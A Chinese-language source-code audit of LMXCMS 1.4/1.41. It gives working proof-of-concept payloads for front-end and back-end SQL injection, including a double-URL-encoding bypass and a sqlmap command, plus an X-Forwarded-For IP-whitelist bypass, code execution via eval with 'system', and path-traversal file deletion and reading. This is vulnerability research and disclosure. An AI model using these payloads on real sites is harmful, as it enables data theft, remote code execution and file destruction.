lmxcms源码审计
1.4前台sql注入漏洞
c/index/TagsAction.class.php
1.构造函数通过_POST方式获取name变量
2.p函数对数据校验,过滤关键字+addslashes转义
3.通过delHtml函数(strip_tag函数)去除标签对,进行一次url编码
4.sql拼接查询
data:image/s3,"s3://crabby-images/86f6a/86f6a98090ecd053bacd272187f7e1127504f188" alt=""
data:image/s3,"s3://crabby-images/4852d/4852dfa085b41a549e3c15a193704e9d8880729f" alt=""
data:image/s3,"s3://crabby-images/3f461/3f461c3f82e90d0986395baa50df8a12c11485a0" alt=""
数据检查后进行了一次urldecode,可以通过两次url编码绕过addslashes函数的转义
1 | poc: 'and (updatexml(1,concat(0x7e,(database()),0x7e),1)) and '1'='1 |
data:image/s3,"s3://crabby-images/babfb/babfb355defeefb2de3cab298c4a2d3ac99e54a4" alt=""
lmx1.txt
1 | GET /lmxcms1.4/index.php?m=tags&a=index&name=1 HTTP/1.1 |
sqlmap:
1 | python2 sqlmap.py -r lmx1.txt --technique=E -v3 --tamper=chardoubleencode -p name --dbs |
1.4/1.41后台sql注入漏洞
c/index/AcquisiAction.class.class.php
POST的参数未过滤,但后台本身可以执行sql语句(无回显),此漏洞危害较低
data:image/s3,"s3://crabby-images/8eefb/8eefb33cf68193d99d7796af99e345712b338cc4" alt=""
1 | poc:1' and updatexml(0,concat(0x7e,database()),1) and '1 |
data:image/s3,"s3://crabby-images/4a2d1/4a2d116e311cabb432d3839425b2a2a35f53e432" alt=""
c/admin/AcquisAction.class.php 中 311行查询时对获取的lid参数未检验,且sql语句直接拼接,导致sql注入
data:image/s3,"s3://crabby-images/4594e/4594ec04ec133d2704679e4e6f3ea5cd81f2c2c8" alt=""
data:image/s3,"s3://crabby-images/6856e/6856e93b41a18d0480ab5076c5c4fc7e101de10c" alt=""
1 | Poc: http://127.0.0.1:8081/lmxcms1.4/admin.php?m=Acquisi&a=showCjData&lid=-1+union+select+1,1,1,(select+1+and+(updatexml(1,concat(0x7e,(select+database()),0x7e),1))),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 |
data:image/s3,"s3://crabby-images/6ba98/6ba9811df5fe4fb00ab58043830283914ac9047e" alt=""
1.4/1.41绕过ip白名单
后台ip白名单可通过X-Forwarded-For 绕过
data:image/s3,"s3://crabby-images/7598e/7598e5084752ff3204553872623b0ff416ed0816" alt=""
1.4/1.41后台任意代码执行
c/admin/AcquisAction.class.php 中 318行eval执行了$temdata[‘data’]参数,该参数的值是从lmx_cj_list数据表中查询出的array字段的值,而查询时存在sql注入导致该字段可控,从而导致任意代码执行。
data:image/s3,"s3://crabby-images/20b94/20b94a12dd5244d5ecbff375a392129d3722a903" alt=""
1 | Poc: admin.php?m=Acquisi&a=showCjData&lid=-1+union+select+1,1,1,'1;system(\'ipconfig\');',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 |
data:image/s3,"s3://crabby-images/519b9/519b992e91bcec6a543b72b5d09ddf38b5623d99" alt=""
1.4/1.41 后台任意文件删除
c/admin/FileAction.class.php 中使用unlink方法删除文件,unlink方法调用php unlink方法,此处未对传入的路径做检查,存在任意文件删除。
data:image/s3,"s3://crabby-images/ba9f2/ba9f218ac6f2266f8fedf7c4fdc3b841405ba2a2" alt=""
poc:
1 | POST /lmxcms1.4/admin.php?m=File&a=delete HTTP/1.1 |
其中test.txt在index.php 同级目录下,且可使用..进行目录穿越。
1.4/1.41 后台任意文件读取
c/admin/TemplateAction.class.php
data:image/s3,"s3://crabby-images/b1c17/b1c17500e1453e067b8f5bdd1e4f1d34f113b65c" alt=""
data:image/s3,"s3://crabby-images/dd510/dd5104070bd0ab603b674da136ac6fde9c720c61" alt=""
data:image/s3,"s3://crabby-images/e97d9/e97d9f8337f75b7c1abaf702d0a37a8ab6efbe99" alt=""
poc:
1 | http://localhost:8081/lmxcms1.4/admin.php?m=Template&a=editfile&dir=../flag.txt |